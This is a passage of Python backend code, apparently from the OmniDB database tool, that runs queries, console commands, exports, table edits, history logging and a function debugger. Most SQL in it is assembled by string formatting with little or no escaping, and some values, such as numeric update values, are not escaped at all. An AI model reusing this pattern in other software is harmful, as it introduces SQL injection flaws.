duration = '{0}:{1}:{2}'.format("%02d" % (hours,),"%02d" % (minutes,),"%02d" % (seconds,))
return duration
def LogHistory(p_omnidb_database,
p_user_id,
p_user_name,
p_sql,
p_start,
p_end,
p_duration,
p_status,
p_conn_id):
try:
logger.info('''*** SQL Command ***
USER: {0},
START: {1},
END: {2},
DURATION: {3},
STATUS: {4},
COMMAND: {5}'''.format(p_user_name,
p_start.strftime('%Y-%m-%d %H:%M:%S.%f'),
p_end.strftime('%Y-%m-%d %H:%M:%S.%f'),
p_duration,
p_status,
p_sql.replace("'","''")))
p_omnidb_database.v_connection.Execute('''
insert into command_list values (
{0},
(select coalesce(max(cl_in_codigo), 0) + 1 from command_list),
'{1}',
'{2}',
'{3}',
'{4}',
'{5}',
{6})
'''.format(p_user_id,
p_sql.replace("'","''"),
p_start.strftime('%Y-%m-%d %H:%M:%S'),
p_end.strftime('%Y-%m-%d %H:%M:%S'),
p_status,
p_duration,
p_conn_id))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
def thread_advancedobjectsearch(self, p_key1, p_key2, p_sql, p_args, p_ws_object):
try:
v_session = p_ws_object.v_session
#This thread pool was canceled by the user, so do nothing
if self.cancel:
return
v_database = OmniDatabase.Generic.InstantiateDatabase(
p_args['v_database'].v_db_type,
p_args['v_database'].v_connection.v_host,
p_args['v_database'].v_connection.v_port,
p_args['v_database'].v_active_service,
p_args['v_database'].v_active_user,
p_args['v_database'].v_connection.v_password,
p_args['v_database'].v_conn_id,
p_args['v_database'].v_alias,
p_conn_string = p_args['v_database'].v_conn_string,
p_parse_conn_string = False
)
v_database.v_connection.Open()
try:
self.tag['lock'].acquire()
self.tag['activeConnections'].append(v_database.v_connection)
finally:
self.tag['lock'].release()
v_sql = re.sub(r'--#FILTER_PATTERN_CASE_SENSITIVE#.*\n', '', p_sql)
v_sql = re.sub(r'--#FILTER_PATTERN_CASE_INSENSITIVE#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_PATTERN_REGEX_CASE_SENSITIVE#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_PATTERN_REGEX_CASE_INSENSITIVE#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_DATA_CATEGORY_FILTER#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_BY_SCHEMA#.*\n', '', v_sql)
v_result = {
'count': v_database.v_connection.ExecuteScalar('''
select count(x.*)
from (
{0}
) x
'''.format(p_sql)
),
'sql': sqlparse.format(v_sql, reindent=True),
'exception': None
}
v_database.v_connection.Close()
try:
self.tag['lock'].acquire()
self.tag['activeConnections'].remove(v_database.v_connection)
if p_key1 is not None:
if p_key2 is not None: #Data category on
if p_key1 not in self.tag['result']: #If data not in result
self.tag['result'][p_key1] = {
'count': 0,
'result': {},
'exception': None
}
self.tag['result'][p_key1]['count'] += v_result['count']
self.tag['result'][p_key1]['result'][p_key2] = v_result
else:
self.tag['result'][p_key1] = v_result
finally:
self.tag['lock'].release()
except Exception as exc:
#logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_result = {
'count': 0,
'sql': '',
'exception': traceback.format_exc().replace('\n', '<br />')
}
try:
self.tag['lock'].acquire()
if v_database is not None and v_database.v_connection is not None and v_database.v_connection in self.tag['activeConnections']:
v_database.v_connection.Close()
self.tag['activeConnections'].remove(v_database.v_connection)
if p_key1 is not None:
if p_key2 is not None: #Data category on
if p_key1 not in self.tag['result']: #If data not in result
self.tag['result'][p_key1] = {
'count': 0,
'result': {},
'exception': ''
}
self.tag['result'][p_key1]['count'] += v_result['count']
self.tag['result'][p_key1]['exception'] += '<br />{0}'.format(v_result['exception'])
self.tag['result'][p_key1]['result'][p_key2] = v_result
else:
self.tag['result'][p_key1] = v_result
finally:
self.tag['lock'].release()
def thread_query(self,args,ws_object):
v_response = {
'v_code': response.QueryResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
try:
v_database_index = args['v_db_index']
v_sql = args['v_sql_cmd']
v_cmd_type = args['v_cmd_type']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_mode = args['v_mode']
v_all_data = args['v_all_data']
v_log_query = args['v_log_query']
v_tab_title = args['v_tab_title']
v_autocommit = args['v_autocommit']
#Removing last character if it is a semi-colon
if v_sql[-1:]==';':
v_sql = v_sql[:-1]
v_session = ws_object.v_session
v_database = args['v_database']
v_omnidb_database = OmniDatabase.Generic.InstantiateDatabase(
'sqlite',
'',
'',
settings.OMNIDB_DATABASE,
'',
'',
'0',
''
)
log_start_time = datetime.now()
log_status = 'success'
v_inserted_id = None
try:
#insert new tab record
if not v_tab_object['tab_db_id'] and not v_tab_object['inserted_tab'] and v_log_query:
try:
v_omnidb_database.v_connection.Open()
v_omnidb_database.v_connection.Execute('''
insert into tabs (conn_id,user_id,tab_id,snippet,title)
values
({0},{1},(select coalesce(max(tab_id), 0) + 1 from tabs),'{2}','{3}')
'''.format(ws_object.v_session.v_databases[v_tab_object['database_index']]['database'].v_conn_id, ws_object.v_session.v_user_id, v_tab_object['sql_save'].replace("'","''"),v_tab_title.replace("'","''")))
v_inserted_id = v_omnidb_database.v_connection.ExecuteScalar('''
select coalesce(max(tab_id), 0) from tabs
''')
v_omnidb_database.v_connection.Close()
v_tab_object['inserted_tab'] = True
v_inserted_tab = True
except Exception as exc:
None
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
if v_cmd_type=='export_csv' or v_cmd_type=='export_xlsx':
#cleaning temp folder
clean_temp_folder()
if v_cmd_type=='export_csv':
v_extension = 'csv'
else:
v_extension = 'xlsx'
v_export_dir = settings.TEMP_DIR
if not os.path.exists(v_export_dir):
os.makedirs(v_export_dir)
v_database.v_connection.Open()
v_file_name = '{0}.{1}'.format(str(time.time()).replace('.','_'),v_extension)
v_data1 = v_database.v_connection.QueryBlock(v_sql, 1000, False, True)
#if platform.system() == 'Windows':
# f = Spartacus.Utils.DataFileWriter(os.path.join(v_export_dir, v_file_name), v_data1.Columns, 'windows-1252')
#else:
# f = Spartacus.Utils.DataFileWriter(os.path.join(v_export_dir, v_file_name), v_data1.Columns)
f = Spartacus.Utils.DataFileWriter(os.path.join(v_export_dir, v_file_name), v_data1.Columns,v_session.v_csv_encoding, v_session.v_csv_delimiter)
f.Open()
if v_database.v_connection.v_start:
f.Write(v_data1)
v_hasmorerecords = False
elif len(v_data1.Rows) > 0:
f.Write(v_data1)
v_hasmorerecords = True
else:
v_hasmorerecords = False
while v_hasmorerecords:
v_data1 = v_database.v_connection.QueryBlock(v_sql, 1000, False, True)
if v_database.v_connection.v_start:
f.Write(v_data1)
v_hasmorerecords = False
elif len(v_data1.Rows) > 0:
f.Write(v_data1)
v_hasmorerecords = True
else:
v_hasmorerecords = False
v_database.v_connection.Close()
f.Flush()
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_filename': settings.PATH + '/static/temp/{0}'.format(v_file_name),
'v_downloadname': 'omnidb_exported.{0}'.format(v_extension),
'v_duration': v_duration,
'v_inserted_id': v_inserted_id,
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': False
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
if v_mode==0:
v_database.v_connection.v_autocommit = v_autocommit
if not v_database.v_connection.v_con or v_database.v_connection.GetConStatus() == 0:
v_database.v_connection.Open()
else:
v_database.v_connection.v_start=True
if (v_mode==0 or v_mode==1) and not v_all_data:
v_data1 = v_database.v_connection.QueryBlock(v_sql, 50, True, True)
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
v_notices_length = len(v_notices)
if v_notices_length > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
v_database.v_connection.ClearNotices()
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_col_names' : v_data1.Columns,
'v_data' : v_data1.Rows,
'v_last_block': True,
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': v_notices_length,
'v_inserted_id': v_inserted_id,
'v_status': v_database.v_connection.GetStatus(),
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': True
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#if len(v_data1.Rows) < 50 and v_autocommit:
# try:
# v_database.v_connection.Close()
# except:
# pass
elif v_mode==2 or v_all_data:
v_hasmorerecords = True
k = 0
while v_hasmorerecords:
k = k + 1
v_data1 = v_database.v_connection.QueryBlock(v_sql, 10000, True, True)
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
v_notices_length = len(v_notices)
if v_notices_length > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
v_database.v_connection.ClearNotices()
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_col_names' : v_data1.Columns,
'v_data' : v_data1.Rows,
'v_last_block': False,
#'v_query_info' : "Number of records: {0}".format(len(v_data1.Rows)),
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': v_notices_length,
'v_inserted_id': v_inserted_id,
'v_status': '',
'v_con_status': 0,
'v_chunks': True
}
if v_database.v_connection.v_start:
v_hasmorerecords = False
elif len(v_data1.Rows) > 0:
v_hasmorerecords = True
else:
v_hasmorerecords = False
if self.cancel:
break
elif v_hasmorerecords:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
if not self.cancel:
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_col_names' : v_data1.Columns,
'v_data' : v_data1.Rows,
'v_last_block': True,
#'v_query_info' : "Number of records: {0}".format(len(v_data1.Rows)),
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': len(v_notices),
'v_inserted_id': v_inserted_id,
'v_status': v_database.v_connection.GetStatus(),
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': True
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
elif v_mode==3 or v_mode==4:
v_duration = GetDuration(log_start_time,log_end_time)
#commit
if v_mode==3:
v_database.v_connection.Query('COMMIT;',True)
else:
v_database.v_connection.Query('ROLLBACK;',True)
v_response['v_data'] = {
'v_col_names' : None,
'v_data' : [],
'v_last_block': True,
#'v_query_info' : "",
'v_duration': v_duration,
'v_notices': "",
'v_notices_length': 0,
'v_inserted_id': v_inserted_id,
'v_status': v_database.v_connection.GetStatus(),
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': False
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
if not self.cancel:
try:
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
except:
v_notices = []
v_notices_text = ''
#try:
# v_database.v_connection.Close()
#except:
# pass
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
log_status = 'error'
v_response['v_data'] = {
'position': v_database.GetErrorPosition(str(exc)),
'message' : str(exc).replace('\n','<br>'),
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': len(v_notices),
'v_inserted_id': v_inserted_id,
'v_status': 0,
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': False
}
v_response['v_error'] = True
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Log to history
if v_mode==0 and v_log_query:
LogHistory(v_omnidb_database,
v_session.v_user_id,
v_session.v_user_name,
v_sql,
log_start_time,
log_end_time,
v_duration,
log_status,
ws_object.v_session.v_databases[v_tab_object['database_index']]['database'].v_conn_id)
#if mode=0 save tab
if v_mode==0 and v_tab_object['tab_db_id'] and v_log_query:
try:
v_omnidb_database.v_connection.Execute('''
update tabs
set conn_id = {0},
snippet = '{1}',
title = '{2}'
where tab_id = {3}
'''.format(ws_object.v_session.v_databases[v_tab_object['database_index']]['database'].v_conn_id, v_tab_object['sql_save'].replace("'","''"),v_tab_title.replace("'","''"), v_tab_object['tab_db_id']))
except Exception as exc:
None
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_error'] = True
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_console(self,args,ws_object):
v_response = {
'v_code': response.ConsoleResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
try:
v_database_index = args['v_db_index']
v_sql = args['v_sql_cmd']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_autocommit = args['v_autocommit']
v_mode = args['v_mode']
#Removing last character if it is a semi-colon
if v_sql[-1:]==';':
v_sql = v_sql[:-1]
v_session = ws_object.v_session
v_database = args['v_database']
v_omnidb_database = OmniDatabase.Generic.InstantiateDatabase(
'sqlite',
'',
'',
settings.OMNIDB_DATABASE,
'',
'',
'0',
''
)
log_start_time = datetime.now()
log_status = 'success'
try:
list_sql = sqlparse.split(v_sql)
v_data_return = ''
run_command_list = True
if v_mode==0:
v_database.v_connection.v_autocommit = v_autocommit
if not v_database.v_connection.v_con or v_database.v_connection.GetConStatus() == 0:
v_database.v_connection.Open()
else:
v_database.v_connection.v_start=True
if v_mode == 1 or v_mode ==2:
v_table = v_database.v_connection.QueryBlock('', 50, True, True)
#need to stop again
if not v_database.v_connection.v_start or len(v_table.Rows)>=50:
v_data_return += '\n' + v_table.Pretty(v_database.v_connection.v_expanded) + '\n' + v_database.v_connection.GetStatus()
run_command_list = False
v_show_fetch_button = True
else:
v_data_return += '\n' + v_table.Pretty(v_database.v_connection.v_expanded) + '\n' + v_database.v_connection.GetStatus()
run_command_list = True
list_sql = v_tab_object['remaining_commands']
if v_mode == 3:
run_command_list = True
list_sql = v_tab_object['remaining_commands']
if run_command_list:
counter = 0
v_show_fetch_button = False
for sql in list_sql:
counter = counter + 1
try:
formated_sql = sql.strip()
v_data_return += '\n>> ' + formated_sql + '\n'
v_database.v_connection.ClearNotices()
v_database.v_connection.v_start=True
v_data1 = v_database.v_connection.Special(sql);
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice
v_data_return += v_notices_text
v_data_return += v_data1
if v_database.v_use_server_cursor:
if v_database.v_connection.v_last_fetched_size == 50:
v_tab_object['remaining_commands'] = list_sql[counter:]
v_show_fetch_button = True
break
except Exception as exc:
try:
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice
v_data_return += v_notices_text
except Exception as exc:
None
v_data_return += str(exc)
v_tab_object['remaining_commands'] = []
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_data' : v_data_return,
'v_last_block': True,
'v_duration': v_duration
}
#send data in chunks to avoid blocking the websocket server
chunks = [v_data_return[x:x+10000] for x in range(0, len(v_data_return), 10000)]
if len(chunks)>0:
for count in range(0,len(chunks)):
if self.cancel:
break
if not count==len(chunks)-1:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': False,
'v_duration': v_duration,
'v_show_fetch_button': v_show_fetch_button,
'v_con_status': '',
}
else:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': True,
'v_duration': v_duration,
'v_show_fetch_button': v_show_fetch_button,
'v_con_status': v_database.v_connection.GetConStatus(),
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
try:
v_database.v_connection.ClearNotices()
except Exception:
None
except Exception as exc:
#try:
# v_database.v_connection.Close()
#except:
# pass
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
log_status = 'error'
v_response['v_data'] = {
'v_data': str(exc),
'v_duration': v_duration
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
if v_mode == 0:
#logging to console history
v_omnidb_database.v_connection.Open()
v_omnidb_database.v_connection.Execute('BEGIN TRANSACTION')
v_omnidb_database.v_connection.Execute('''
insert into console_history values (
{0},
{1},
'{2}',
DATETIME('now'))
'''.format(v_session.v_user_id,
v_database.v_conn_id,
v_sql.replace("'","''")))
#keep 100 rows in console history table for current user/connection
v_omnidb_database.v_connection.Execute('''
delete
from console_history
where command_date not in (
select command_date
from console_history
where user_id = {0}
and conn_id = {1}
order by command_date desc
limit 100
)
and user_id = {0}
and conn_id = {1}
'''.format(v_session.v_user_id,
v_database.v_conn_id,
v_sql.replace("'","''")))
#Log to history
LogHistory(v_omnidb_database,
v_session.v_user_id,
v_session.v_user_name,
v_sql,
log_start_time,
log_end_time,
v_duration,
log_status,
v_database.v_conn_id)
v_omnidb_database.v_connection.Close()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_data'] = {
'v_data': str(exc),
'v_duration': ''
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_terminal(self,args,ws_object):
v_response = {
'v_code': response.TerminalResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
try:
v_cmd = args['v_cmd']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_terminal_object = v_tab_object['terminal_object']
while not self.cancel:
try:
if v_tab_object['terminal_type'] == 'local':
v_data_return = v_terminal_object.read_nonblocking(size=1024)
else:
v_data_return = v_terminal_object.read_current()
v_response['v_data'] = {
'v_data' : v_data_return,
'v_last_block': True
}
#send data in chunks to avoid blocking the websocket server
chunks = [v_data_return[x:x+10000] for x in range(0, len(v_data_return), 10000)]
if len(chunks)>0:
for count in range(0,len(chunks)):
if self.cancel:
break
if not count==len(chunks)-1:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': False
}
else:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': True
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
if 'EOF' in str(exc):
break
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_data'] = {
'v_data': str(exc),
'v_duration': ''
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_query_edit_data(self,args,ws_object):
v_response = {
'v_code': response.QueryEditDataResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': {
'v_data' : [],
'v_row_pk' : [],
'v_query_info' : ''
}
}
try:
v_database_index = args['v_db_index']
v_table = args['v_table']
v_schema = args['v_schema']
v_filter = args['v_filter']
v_count = args['v_count']
v_pk_list = args['v_pk_list']
v_columns = args['v_columns']
v_tab_id = args['v_tab_id']
v_session = ws_object.v_session
v_database = args['v_database']
try:
if v_database.v_has_schema:
v_table_name = v_schema + '.' + v_table
else:
v_table_name = v_table
v_column_list = ''
v_first = True
for v_column in v_columns:
if not v_first:
v_column_list = v_column_list + ','
v_first = False
v_column_list = v_column_list + v_column['v_readformat'].replace('#', v_column['v_column'])
v_data1 = v_database.QueryTableRecords(v_column_list, v_table_name, v_filter, v_count)
v_response['v_data']['v_query_info'] = 'Number of records: ' + str(len(v_data1.Rows))
for v_row in v_data1.Rows:
v_row_data = []
v_row_pk = []
for j in range(0, len(v_pk_list)):
v_pk_col = {}
v_pk_col['v_column'] = v_pk_list[j]['v_column']
v_pk_col['v_value'] = v_row[v_pk_list[j]['v_column'].replace('"','')]
v_row_pk.append(v_pk_col)
v_response['v_data']['v_row_pk'].append(v_row_pk)
v_row_data.append('')
for v_col in v_data1.Columns:
v_row_data.append(str(v_row[v_col]))
v_response['v_data']['v_data'].append(v_row_data)
except Exception as exc:
v_response['v_data'] = str(exc)
v_response['v_error'] = True
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_error'] = True
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_save_edit_data(self,args,ws_object):
v_response = {
'v_code': response.SaveEditDataResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': []
}
try:
v_database_index = args['v_db_index']
v_table = args['v_table']
v_schema = args['v_schema']
v_data_rows = args['v_data_rows']
v_rows_info = args['v_rows_info']
v_pk_info = args['v_pk_info']
v_columns = args['v_columns']
v_tab_id = args['v_tab_id']
v_session = ws_object.v_session
v_database = args['v_database']
if v_database.v_has_schema:
v_table_name = v_schema + '.' + v_table
else:
v_table_name = v_table
i = 0
for v_row_info in v_rows_info:
if (self.cancel):
return
v_command = ''
# Deleting row
if v_row_info['mode'] == -1:
v_command = 'delete from ' + v_table_name + ' where '
v_first = True
v_pk_index = 0
for v_pk in v_row_info['pk']:
if not v_first:
v_command = v_command + ' and '
v_first = False
for j in range(0, len(v_pk_info)):
if v_pk['v_column'] == v_pk_info[j]['v_column']:
v_pk_index = j
break
if v_pk_info[v_pk_index]['v_class'] == 'numeric':
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', str(v_pk['v_column'])) + ' = ' + v_pk_info[v_pk_index]['v_compareformat'].replace('#', str(v_pk['v_value']))
else:
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', str(v_pk['v_column'])) + ' = ' + v_pk_info[v_pk_index]['v_compareformat'].replace('#', "'" + str(v_pk['v_value']) + "'")
v_row_info_return = {}
v_row_info_return['mode'] = -1
v_row_info_return['index'] = v_row_info['index']
v_row_info_return['command'] = v_command
try:
v_database.v_connection.Execute(v_command)
v_row_info_return['error'] = False
v_row_info_return['v_message'] = 'Success.'
except Exception as exc:
v_row_info_return['error'] = True
v_row_info_return['v_message'] = str(exc)
v_response['v_data'].append(v_row_info_return)
# Inserting new row
elif v_row_info['mode'] == 2:
v_command = 'insert into ' + v_table_name + ' ( '
v_first = True
for v_col in v_columns:
if not v_first:
v_command = v_command + ', '
v_first = False
v_command = v_command + v_col['v_column']
v_command = v_command + ' ) values ( '
v_first = True
for j in range(1, len(v_data_rows[i])):
if not v_first:
v_command = v_command + ', '
v_first = False
v_value = ''
if v_data_rows[i][j] != None:
v_value = v_data_rows[i][j]
if v_columns[j-1]['v_class'] == 'numeric' or v_columns[j-1]['v_class'] == 'other':
if v_value == '':
v_command = v_command + 'null'
else:
v_command = v_command + v_columns[j-1]['v_writeformat'].replace('#', v_value.replace("'", "''"))
else:
v_command = v_command + v_columns[j-1]['v_writeformat'].replace('#', v_value.replace("'", "''"))
v_command = v_command + ' )'
v_row_info_return = {}
v_row_info_return['mode'] = 2
v_row_info_return['index'] = v_row_info['index']
v_row_info_return['command'] = v_command
try:
v_database.v_connection.Execute(v_command)
v_row_info_return['error'] = False
v_row_info_return['v_message'] = 'Success.'
except Exception as exc:
v_row_info_return['error'] = True
v_row_info_return['v_message'] = str(exc)
v_response['v_data'].append(v_row_info_return)
# Updating existing row
elif v_row_info['mode'] == 1:
v_command = 'update ' + v_table_name + ' set '
v_first = True
for v_col_index in v_rows_info[i]['changed_cols']:
if not v_first:
v_command = v_command + ', '
v_first = False
v_value = ''
if v_data_rows[i][v_col_index+1] != None:
v_value = v_data_rows[i][v_col_index+1]
v_command = v_command + v_columns[v_col_index]['v_column'] + ' = '
if v_columns[v_col_index]['v_class'] == 'numeric' or v_columns[v_col_index]['v_class'] == 'other':
if v_value == '':
v_command = v_command + 'null'
else:
v_command = v_command + v_columns[v_col_index]['v_writeformat'].replace('#', v_value)
else:
v_command = v_command + v_columns[v_col_index]['v_writeformat'].replace('#', v_value.replace("'", "''"))
v_command = v_command + ' where '
v_first = True
v_pk_index = 0
for v_pk in v_row_info['pk']:
if not v_first:
v_command = v_command + ' and '
v_first = False
for j in range(0, len(v_pk_info)):
if v_pk['v_column'] == v_pk_info[j]['v_column']:
v_pk_index = j
break
if v_pk_info[v_pk_index]['v_class'] == 'numeric':
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', v_pk['v_column'] + ' = ' + str(v_pk['v_value']))
else:
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', v_pk['v_column'] + " = '" + str(v_pk['v_value']) + "'")
v_row_info_return = {}
v_row_info_return['mode'] = 1
v_row_info_return['index'] = v_row_info['index']
v_row_info_return['command'] = v_command
try:
v_database.v_connection.Execute(v_command)
v_row_info_return['error'] = False
v_row_info_return['v_message'] = 'Success.'
except Exception as exc:
v_row_info_return['error'] = True
v_row_info_return['v_message'] = str(exc)
v_response['v_data'].append(v_row_info_return)
i = i + 1
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_error'] = True
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_debug_run_func(self,args,ws_object):
v_response = {
'v_code': -1,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
v_tab_object = args['v_tab_object']
v_database_debug = v_tab_object['omnidatabase_debug']
v_database_control = v_tab_object['omnidatabase_control']
try:
#enable debugger for current connection
v_conn_string = "host=localhost port={0} dbname=''{1}'' user=''{2}''".format(args['v_port'],v_database_debug.v_service,v_database_debug.v_user);
v_database_debug.v_connection.Execute("select omnidb.omnidb_enable_debugger('{0}')".format(v_conn_string))
#run function it will lock until the function ends
if args['v_type'] == 'f':
v_func_return = v_database_debug.v_connection.Query('select * from {0} limit 1000'.format(args['v_function']),True)
else:
v_func_return = v_database_debug.v_connection.Query('call {0}'.format(args['v_function']),True)
#Not cancelled, return all data
if not v_tab_object['cancelled']:
#retrieve variables
v_variables = v_database_debug.v_connection.Query('select name,attribute,vartype,value from omnidb.variables where pid = {0}'.format(v_tab_object['debug_pid']),True)
#retrieve statistics
v_statistics = v_database_debug.v_connection.Query('select lineno,coalesce(trunc((extract("epoch" from tend) - extract("epoch" from tstart))::numeric,4),0) as msec from omnidb.statistics where pid = {0} order by step'.format(v_tab_object['debug_pid']),True)
#retrieve statistics summary
v_statistics_summary = v_database_debug.v_connection.Query('''
select lineno, max(msec) as msec
from (select lineno,coalesce(trunc((extract("epoch" from tend) - extract("epoch" from tstart))::numeric,4),0) as msec from omnidb.statistics where pid = {0}) t
group by lineno
order by lineno
'''.format(v_tab_object['debug_pid']),True)
#retrieve notices
v_notices = v_database_debug.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
v_response['v_data'] = {
'v_state': debugState.Finished,
'v_remove_context': True,
'v_result_rows': v_func_return.Rows,
'v_result_columns': v_func_return.Columns,
'v_result_statistics': v_statistics.Rows,
'v_result_statistics_summary': v_statistics_summary.Rows,
'v_result_notices': v_notices_text,
'v_result_notices_length': len(v_notices),
'v_variables': v_variables.Rows,
'v_error': False
}
v_database_debug.v_connection.Close()
#send debugger finished message
v_response['v_code'] = response.DebugResponse
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Cancelled, return cancelled status
else:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Cancel,
'v_remove_context': True,
'v_error': False
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
#Not cancelled
if not v_tab_object['cancelled']:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Finished,
'v_remove_context': True,
'v_error': True,
'v_error_msg': str(exc)
}
try:
v_database_debug.v_connection.Close()
except Exception:
None
try:
v_database_control.v_connection.Close()
except Exception:
None
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Cancel,
'v_remove_context': True,
'v_error': False
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_debug(self,args,ws_object):
v_response = {
'v_code': -1,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
v_state = args['v_state']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_database_debug = v_tab_object['omnidatabase_debug']
v_database_control = v_tab_object['omnidatabase_control']
try:
if v_state == debugState.Starting:
#Start debugger and return ready state
v_database_debug.v_connection.Open()
v_database_control.v_connection.Open()
#Cleaning contexts table
v_database_debug.v_connection.Execute('delete from omnidb.contexts t where t.pid not in (select pid from pg_stat_activity where pid = t.pid)')
connections_details = v_database_debug.v_connection.Query('select pg_backend_pid()',True)
pid = connections_details.Rows[0][0]
v_database_debug.v_connection.Execute('insert into omnidb.contexts (pid, function, hook, lineno, stmttype, breakpoint, finished) values ({0}, null, null, null, null, 0, false)'.format(pid))
#lock row for current pid
v_database_control.v_connection.Execute('select pg_advisory_lock({0}) from omnidb.contexts where pid = {0}'.format(pid))
#updating pid and port in tab object
